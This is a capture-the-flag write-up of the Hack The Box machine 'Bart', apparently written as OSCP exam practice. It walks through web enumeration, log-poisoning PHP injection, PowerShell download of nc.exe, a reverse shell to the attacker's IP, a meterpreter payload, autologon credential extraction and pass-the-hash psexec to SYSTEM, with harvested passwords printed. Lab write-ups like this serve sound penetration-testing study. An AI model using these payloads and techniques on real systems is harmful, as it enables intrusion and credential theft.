Introduction

I felt like Bart was a pretty good box. It’s extremely similar to some of the boxes in the OSCP labs, and the avenue used to get code execution I’ve already seen at least twice so far. If you are taking the OSCP (I currently am) I highly recommend going through the motions of this box because Bart is a prime example of a potential box you would get, with very similar attack vectors that you need to be able to exploit. I plan on editing this write-up a bit later to include how to complete this box without the use of Metasploit, but only after I get some sleep since I’ve been up all night. Sorry if there are any quailty control mistakes in advance it’s too early for me.

Enumeration

Initial Scanning

Like with every hack the box machine lets begin with an nmap scan against Bart (10.10.10.81)

root@dastinia:~/htb/bart# nmap -sV -sC 10.10.10.81 -oA nmap/bart_initscan Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-11 21:17 EDT Nmap scan report for 10.10.10.81 Host is up (0.18s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Did not follow redirect to http://forum.bart.htb/ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 28.00 seconds

We see that the only available service is the IIS web service running on port 80. We can also determine from the IIS 10 http header that this is likely a windows server 2016 or windows 10 system running under the hood.

Enumeration Port 80 (forum.bart.htb (wordpress))

From our nmap scan we can that we are being redirected automatically to forum.bart.htb . Since htb doesn’t have global dns, we aren’t going to be able to resolve the site. We can add a dns entry in our /etc/hosts file to point 10.10.10.81 to both bart.htb and forum.bart.htb . Reference

adding the /etc/hosts entry

root@dastinia:~/htb/bart# echo "10.10.10.81 forum.bart.htb" >> /etc/hosts root@dastinia:~/htb/bart# echo "10.10.10.81 bart.htb" >> /etc/hosts

Visiting forum.bart.htb in a browser brings us to a snazzy SPA Wordpress site.

Attempting to access the Wordpress login page ends up with an error: "The page cannot be displayed because an internal server error has occurred." This is strange because there’s not much else going on with the site. Likely is might be some sort of rabbit hole.

Running gobuster on forum.bart.htb doesn't reveal anything extremely interesting. Thinking that maybe there is some hidden content with the site, we mirror the site with wget, and search for interesting content like emails, extra domain names, or hidden pages.

We were able to discover a few potential emails/usernames but nothing that stood out blindly. We did notice that the bart developer Harvey Potter h.potter@bart.htb is the only member of the team not displayed on the main site, but who’s information is stored in a comment on the page.

mirroring site locally

root@dastinia:~/htb/bart/bart_wpsite# wget -r http://forum.bart.htb root@dastinia:~/htb/bart/bart_wpsite# grep -RiP "bart" forum.bart.htb/ forum.bart.htb/index.html:<title>BART</title> forum.bart.htb/index.html:<link rel='stylesheet' id='sydney-ie9-css' href='http://forum.bart.htb/wp-content/themes/sydney/css/ie9.css?ver=4.8.2' type='text/css' media='all' /> forum.bart.htb/index.html: <h1 class="site-title"><a href="#" rel="home">BART</a></h1> forum.bart.htb/index.html: <div class="pos">CEO@BART</div> forum.bart.htb/index.html: <li><a class="mail" href="mailto:s.brown@bart.local" target="_blank"><i class="fa">M</i></a></li> forum.bart.htb/index.html: <div class="pos">CEO@BART</div> forum.bart.htb/index.html: <li><a class="mail" href="mailto:d.simmons@bart.htb" target="_blank"><i class="fa">M</i></a></li> forum.bart.htb/index.html: <li><a class="mail" href="mailto:r.hilton@bart.htb" target="_blank"><i class="fa">M</i></a></li> forum.bart.htb/index.html: <div class="pos">Developer@BART</div> forum.bart.htb/index.html: <li><a class="mail" href="mailto:h.potter@bart.htb" target="_blank"><i class="fa">M</i></a></li> forum.bart.htb/index.html: ...[snip]...

better grep or extract email addresses

root@dastinia:~/htb/bart/bart_wpsite# grep -RiE -o "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b" forum.bart.htb/index.html:s.brown@bart.local forum.bart.htb/index.html:d.simmons@bart.htb forum.bart.htb/index.html:r.hilton@bart.htb forum.bart.htb/index.html:h.potter@bart.htb forum.bart.htb/index.html:info@bart.htb forum.bart.htb/index.html:info@bart.htb

Discovering Monitoring Portal with Wfuzz

Taking a step back, and attempting to enumerate the root of the domain – bart.htb with gobuster you discover that the site seems to be returning some kind of content on every request..

gobuster on bart.htb

root@dastinia:~/htb/bart# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://bart.htb/ -x php,html -s 200,204,301,302,307,403 -t 100 | tee gobuster_bart Gobuster v1.2 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://bart.htb/ [+] Threads : 100 [+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes : 204,301,302,307,403,200 [+] Extensions : .php,.html ===================================================== /index (Status: 200) /news (Status: 200) /crack (Status: 200) /download (Status: 200) /2006 (Status: 200) /images (Status: 200) /serial (Status: 200) /warez (Status: 200) /full (Status: 200) /12 (Status: 200) /contact (Status: 200) /about (Status: 200) /search (Status: 200) /spacer (Status: 200) /logo (Status: 200) /privacy (Status: 200) /11 (Status: 200) /new (Status: 200) /blog (Status: 200) /rss (Status: 200) /home (Status: 200) /faq (Status: 200) /cgi-bin (Status: 200) /10 (Status: 200) /archives (Status: 200) /products (Status: 200) /sitemap (Status: 200) /default (Status: 200) /img (Status: 200) /2005 (Status: 200) /1 (Status: 200) /09 (Status: 200) /links (Status: 200) /01 (Status: 200) /08 (Status: 200) /06 (Status: 200) /2 (Status: 200) /07 (Status: 200) /articles (Status: 200) /login (Status: 200) /keygen (Status: 200) /article (Status: 200) ...[snip]...

Visiting the page in a browser you see that every page you attempt to go to returns the same error page. This technique is pretty common in modern web applications to return a page with the error instead of a standard 404 error message stating that something was wrong.

This will render tools like gobuster, dirb or dirbuster basically useless to gather information since the results will be filled with false positives or will require additional post process filtering to figure out what’s actually real.

To circumvent this we can use wfuzz as our directory brute forcer, and filter the results based on a character count baseline. As you can see below, the resulting error page wfuzz detects as having 158607 characters in the response. We can use this as our baseline and ignore all responses that have 158607 ch in them, which in turn would only show us pages that are different (unique content) with the --hh flag.

root@dastinia:~/htb/bart# wfuzz -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://bart.htb/FUZZ/ Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 2.2.9 - The Web Fuzzer * ******************************************************** Target: http://bart.htb/FUZZ/ Total requests: 220560 ================================================================== ID Response Lines Word Chars Payload ================================================================== 000001: C=302 0 L 0 W 0 Ch "# directory-list-2.3-medium.txt" 000002: C=302 0 L 0 W 0 Ch "#" 000009: C=302 0 L 0 W 0 Ch "# Suite 300, San Francisco, California, 94105, USA." 000003: C=302 0 L 0 W 0 Ch "# Copyright 2007 James Fisher" 000004: C=302 0 L 0 W 0 Ch "#" 000005: C=302 0 L 0 W 0 Ch "# This work is licensed under the Creative Commons" 000016: C=200 630 L 3775 W 158607 Ch "images" 000018: C=200 630 L 3775 W 158607 Ch "2006" 000017: C=200 630 L 3775 W 158607 Ch "download" 000026: C=200 630 L 3775 W 158607 Ch "about" 000021: C=200 630 L 3775 W 158607 Ch "serial" 000025: C=200 630 L 3775 W 158607 Ch "contact" 000027: C=200 630 L 3775 W 158607 Ch "search" 000028: C=200 630 L 3775 W 158607 Ch "spacer" 000022: C=200 630 L 3775 W 158607 Ch "warez" 000023: C=200 630 L 3775 W 158607 Ch "full" 000019: C=200 630 L 3775 W 158607 Ch "news" 000024: C=200 630 L 3775 W 158607 Ch "12" 000032: C=200 630 L 3775 W 158607 Ch "blog" 000029: C=200 630 L 3775 W 158607 Ch "privacy" 000034: C=200 630 L 3775 W 158607 Ch "10" 000073: C=200 630 L 3775 W 158607 Ch "category" 000031: C=200 630 L 3775 W 158607 Ch "logo" 000080: C=200 630 L 3775 W 158607 Ch "media" 000075: C=200 630 L 3775 W 158607 Ch "content" 000033: C=200 630 L 3775 W 158607 Ch "new" 000079: C=200 630 L 3775 W 158607 Ch "press" 000076: C=200 630 L 3775 W 158607 Ch "14" 000083: C=200 630 L 3775 W 158607 Ch "icons" 000081: C=200 630 L 3775 W 158607 Ch "templates" 000082: C=200 630 L 3775 W 158607 Ch "services" 000020: C=200 630 L 3775 W 158607 Ch "crack" 000030: C=200 630 L 3775 W 158607 Ch "11" 000035: C=200 630 L 3775 W 158607 Ch "cgi-bin" 000077: C=200 630 L 3775 W 158607 Ch "main"

Using Wfuzz to hide the error page responses

root@dastinia:~/htb/bart# wfuzz -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://bart.htb/FUZZ/ --hh 158607 Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 2.2.9 - The Web Fuzzer * ******************************************************** Target: http://bart.htb/FUZZ/ Total requests: 220560 ================================================================== ID Response Lines Word Chars Payload ================================================================== 000014: C=302 0 L 0 W 0 Ch "" 000067: C=200 548 L 2412 W 35529 Ch "forum" 001614: C=200 80 L 221 W 3423 Ch "monitor" 002385: C=200 548 L 2412 W 35529 Ch "Forum" 019837: C=200 80 L 221 W 3423 Ch "Monitor"

From our results we can see that there’s content being served from the “forum” and “monitor” directories with the forum being forum.bart.htb

monitor.bart.htb

Visting monitor.bart.htb in our browser reveals the application “PHP Server Monitor v3.2.1”.

After trying the usual hack the box username:password combininations with no luck we begin looking for another avenue to get into this application. PHP monitor has a password reset function, which only takes a username. When you attempt to do a password reset on a user that doesn’t exist you get the following error.

With this knowledge we can attempt to enumerate usernames in a targeted manner using the information gathered from forum.bart.htb .

I compiled a short list of possible user names from the site:

potential usernames compiled from forum.bart.htb

root@dastinia:~/htb/bart# cat names.txt s.brown@bart.local d.simmons@bart.htb r.hilton@bart.htb h.potter@bart.htb info@bart.htb s.brown d.simmons r.hilton h.potter info samantha brown daniel simmons robert hilton harvey potter

We can use burpsuite intruder coupled with the simple list payload to perform this attack.

This is how we can set up burpsuite intruder to perform our attack.

From the results of our intruder attack we see that we have two valid usernames harvey and daniel .

After some educated guessing you will discover a valid username:password combination of harvey:potter .

When you attempt to authenticate you are redirected to monitor.bart.htb which fails to resolve similar to forums. We add monitor.bart.htb to our /etc/hosts file and attempt to reauthenticate with our newly found credentials.

root@dastinia:~# echo "10.10.10.81 monitor.bart.htb " >> /etc/hosts

After we re-authenticate we are greeted with the following page.

Browsing around you see there is an entry for the “Internal Chat” service

Viewing the details of “Internal Chat” reveals that there is another application on a different domain “internal-01.bart.htb”

Exploitation

Simple Chat Source Code Discovery & Account Registration

Visting internal-01.bart.htb in our browser reveals the login page of bart’s internal “dev chat”.

while running gobuster & sqlmap in the background if you did some googling on “simple chat” you will discover the following github repo https://github.com/magkopian/php-ajax-simple-chat. To validate that these two applications are the same, I inspected the css/chat_global.css file and sure enough it was the same application. Looking at the application’s code we see that’s there is registration functionality. The application doesn’t directly give you an option to register for an account, but it seems shoddily built so likely we can try manually crafting the request to register the account and hope nothing changed (we know the location and the parameters required to register an account from auditing the register.php source code).

Sure enough, we are able to register an account with a username:password of medic:medicmedic on the internal dev chat by crafting our request just right.

Getting RCE through LFI & Log Poisoning

Clicking the log link will cause two alerts to appear that seemly do nothing. Inspecting the original application code, there are no references to a “log” functionality so this must be a 3rd party modification. After some fiddling & inspecting the request history in burp suite, you will see that the application will record the username & your user-agent in a log file as seen below.

Since we can control what our user agent is we can use this to execute php code by visiting the log file page.

GET //log/log.php?username=harvey&filename=log.php HTTP/1.1 Host: internal-01.bart.htb User-Agent: <?php exec('whoami'); ?> Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=4o03rnotk1l5b2ols3mkmqm8u9 Connection: close Upgrade-Insecure-Requests: 1

To speed this up I recommend having 2-3 repeater tabs open. One to input commands into, and one to visit the page to trigger the execution.

We upload & execute a 64-bit netcat binary onto the machine (important for later) so we can get an interactive shell.

I injected the following code into the user agent field. Make sure you remember to escape the \ .

<?php echo exec ( "powershell -command \" (New-Object System.Net.WebClient).DownloadFile('http://10.10.15.171:7777/nc.exe','nc.exe') \" " ); ?>

<?php exec ( "nc.exe 10.10.15.171 6667 -e cmd.exe" ); ?>

getting shell

root@dastinia:~# ncat -lnvp 6667 Ncat: Version 7.70 ( https://nmap.org/ncat ) Ncat: Listening on :::6667 Ncat: Listening on 0.0.0.0:6667 Ncat: Connection from 10.10.10.81. Ncat: Connection from 10.10.10.81:49886. Microsoft Windows [Version 10.0.15063] (c) 2017 Microsoft Corporation. All rights reserved. C:\inetpub\wwwroot\internal-01\log>dir Volume in drive C has no label. Volume Serial Number is F84E-9CF7 Directory of C:\inetpub\wwwroot\internal-01\log 12/07/2018 04:06 <DIR> . 12/07/2018 04:06 <DIR> .. 12/07/2018 04:00 101 log.ph 12/07/2018 04:05 2,643 log.php 12/07/2018 04:01 303 log.txt 21/02/2018 20:44 <DIR> Microsoft 12/07/2018 04:06 59,392 nc.exe 4 File(s) 62,439 bytes 3 Dir(s) 15,505,301,504 bytes free C:\inetpub\wwwroot\internal-01\log>whoami nt authority\iusr

Privilege Escalation

Poking around the system you will see that there’s not much going on. It’s a pretty recent build of windows, so that rules a lot of good chunk of kerel-based lpe exploits. Poking around the application folders you discover the password for the mysql database as seen below. You will realize that this was unhelpful information, after attempting to use this password against all the user accounts present on the box.

C:\inetpub\wwwroot\internal-01\simple_chat\includes>type dbconnect.php ...[snip]... function db_connect() { $con = @mysqli_connect('localhost', 'harvey', '!IC4nB3Th3B3st?', 'internal_chat'); if ($con === false) { return false; } mysqli_set_charset ($con , 'UTF-8'); return $con; } ?>

Getting x64 meterpreter shell & impacket

Lets generate a x64 bit meterpreter payload and make an smb share with impacket

generate payload msfvenom

root@dastinia:/opt/serve/windows/kk# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.15.171 LPORT=6969 -f exe > 6969.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 510 bytes Final size of exe file: 7168 bytes

impacket-smb share

root@dastinia:/opt/serve/windows# impacket-smbserver kk kk Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed [*] Incoming connection (10.10.10.81,49813) [*] AUTHENTICATE_MESSAGE (\,BART) [*] User \BART authenticated successfully [*] :::00::4141414141414141 [*] AUTHENTICATE_MESSAGE (\,BART) [*] User \BART authenticated successfully [*] :::00::4141414141414141

setting up multihandler

msf > use exploit/multi/handler msf exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp msf exploit(multi/handler) > set LHOST tun0 LHOST => tun0 msf exploit(multi/handler) > set LPORT 6969 LPORT => 6969 msf exploit(multi/handler) > set ExitonSession False ExitonSession => false msf exploit(multi/handler) > run -j [*] Exploit running as background job 2. [*] Started reverse TCP handler on 10.10.15.171:6969

executting our payload from smb share & getting shell

C:\inetpub\wwwroot\internal-01\log>\\10.10.15.171\kk\6969.exe

session

msf exploit(multi/handler) > [*] Sending stage (206403 bytes) to 10.10.10.81 [*] Meterpreter session 1 opened (10.10.15.171:6969 -> 10.10.10.81:51934) at 2018-07-14 11:44:39 -0400 Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x64/windows NT AUTHORITY\IUSR @ BART 10.10.15.171:6969 -> 10.10.10.81:51934 (10.10.10.81)

The meterpreter shell will die after some time, as well as the AV on the system will delete your shell after you execute it from the SMB share.

Recovering Administrator AutoLogon Credentials

At this point I did a good chunk of manual enumeration on the system. After manually performing the standard windows priviledge escapation tectures you discover that there are credentials stored in the autologon runkey. Here are a few resources I felt are pretty decent at explaining the things you should look for local windows privilege escalation. Fuzzy Security - Windows Privilege Escalation Fundamentals, Pentestlab, and Daya Privilege Escalation

For some reason I wasn’t getting the result I wanted when I performed this action with a regular shell. I’m going to investigate this tomorrow.

It did work with powershell running the following command: Get-ItemProperty -path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"

Since we are already using Metasploit for this box there is a Metasploit post exploitation module called windows_autologin which will extract any autologon credentials from the registry.

msf > use windows/gather/credentials/windows_autologin msf post(windows/gather/credentials/windows_autologin) > set SESSION 7 SESSION => 7 msf post(windows/gather/credentials/windows_autologin) > run [*] Running against BART on session 7 [+] AutoAdminLogon=1, DefaultDomain=DESKTOP-7I3S68E, DefaultUser=Administrator, DefaultPassword=3130438f31186fbaf962f407711faddb [*] Post module execution completed

Getting System with PTH/PSEXEC

Now that we have the administrators credential getting system should be a snap.

We can perform a Pass the Hash Attack with metasploit’s various psexec modules. We need to add a route to the system so that the module can access the smb port 445 listening locally on the box. This can be achieved with metasploit’s route add command.

msf> use auxiliary/admin/smb/psexec_command msf auxiliary(admin/smb/psexec_command) > set SMBUser Administrator SMBUser => Administrator msf auxiliary(admin/smb/psexec_command) > set SMBPass 3130438f31186fbaf962f407711faddb SMBPass => 3130438f31186fbaf962f407711faddb msf auxiliary(admin/smb/psexec_command) > set COMMAND \\\\10.10.15.171\\\kk\\\6969.exe COMMAND => \\10.10.15.171\kk\6969.exe msf auxiliary(admin/smb/psexec_command) > set RHOSTS 10.10.10.81 RHOSTS => 10.10.10.81 msf auxiliary(admin/smb/psexec_command) > options Module options (auxiliary/admin/smb/psexec_command): Name Current Setting Required Description ---- --------------- -------- ----------- COMMAND \\10.10.15.171\kk\6969.exe yes The command you want to execute on the remote host RHOSTS 10.10.10.81 yes The target address range or CIDR identifier RPORT 445 yes The Target port SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing SERVICE_DISPLAY_NAME no The service display name SERVICE_NAME no The service name SMBDomain . no The Windows domain to use for authentication SMBPass 3130438f31186fbaf962f407711faddb no The password for the specified username SMBSHARE C$ yes The name of a writeable share on the server SMBUser Administrator no The username to authenticate as THREADS 1 yes The number of concurrent threads WINPATH WINDOWS yes The name of the remote Windows directory msf auxiliary(admin/smb/psexec_command) > route add 10.10.10.81/32 255.255.255.255 7 [*] Route added msf auxiliary(admin/smb/psexec_command) > run [+] 10.10.10.81:445 - Service start timed out, OK if running a command or non-service executable... [*] 10.10.10.81:445 - checking if the file is unlocked [*] 10.10.10.81:445 - Unable to get handle: The server responded with error: STATUS_SHARING_VIOLATION (Command=45 WordCount=0) [-] 10.10.10.81:445 - Command seems to still be executing. Try increasing RETRY and DELAY [*] 10.10.10.81:445 - Getting the command output... [*] 10.10.10.81:445 - Command finished with no output [*] 10.10.10.81:445 - Executing cleanup... [+] 10.10.10.81:445 - Cleanup was successful [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(admin/smb/psexec_command) > [*] Sending stage (206403 bytes) to 10.10.10.81 [*] Meterpreter session 8 opened (10.10.15.171:6969 -> 10.10.10.81:49866) at 2018-07-14 01:15:57 -0400 msf auxiliary(admin/smb/psexec_command) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 7 meterpreter x64/windows NT AUTHORITY\IUSR @ BART 10.10.15.171:6969 -> 10.10.10.81:49863 (10.10.10.81) 8 meterpreter x64/windows NT AUTHORITY\SYSTEM @ BART 10.10.15.171:6969 -> 10.10.10.81:49866 (10.10.10.81) msf auxiliary(admin/smb/psexec_command) > sessions -i 8 [*] Starting interaction with 8... meterpreter > sysinfo Computer : BART OS : Windows 10 (Build 15063). Architecture : x64 System Language : en_GB Domain : WORKGROUP Logged On Users : 1 Meterpreter : x64/windows meterpreter > getuid Server username: NT AUTHORITY\SYSTEM

That’s all for now. I’m pretty busy with oscp & work so hopefully the next few boxes are machines I already have writeups completed for. I’ll also update this post on how to complete this box without metasploit after I get some sleep.